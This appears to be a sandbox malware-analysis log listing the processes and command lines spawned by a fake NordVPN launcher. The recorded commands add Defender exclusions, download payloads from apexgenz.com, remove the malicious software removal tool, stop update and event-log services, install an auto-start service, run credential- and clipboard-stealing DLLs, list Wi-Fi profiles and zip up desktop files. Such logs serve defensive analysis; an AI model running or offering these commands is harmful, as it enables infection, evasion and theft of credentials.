PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\Panda Free Antivirus - Free download and software reviews - CNET Download.html

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffbb84d9758,0x7ffbb84d9768,0x7ffbb84d9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4532 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5032 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4972 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3984 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5356 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4592 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5100 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3676 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3088 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3148 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4628 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5972 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6136 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\plugin3944

C:\Users\Admin\AppData\Roaming\services\plugin3944

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2236 -ip 2236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 628

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=1760 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Users\Admin\AppData\Roaming\services\2plugin2958

C:\Users\Admin\AppData\Roaming\services\2plugin2958

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\3plugin0324

C:\Users\Admin\AppData\Roaming\services\3plugin0324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 924

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4432 -ip 4432

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1164

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 4432

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1236

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "OZLCSUZD"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1324

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "OZLCSUZD"

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe

C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5492 -ip 5492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 600

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\dwm.exe

dwm.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5348 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=4992 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1400 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 524

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4512 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1588

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000006011\bfe59db647.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1584

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap14207:118:7zEvent27214

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual_installer_v4.67877\" -ad -an -ai#7zMap20012:112:7zEvent11390

C:\Program Files\Google\Chrome\Application\chrome.exe

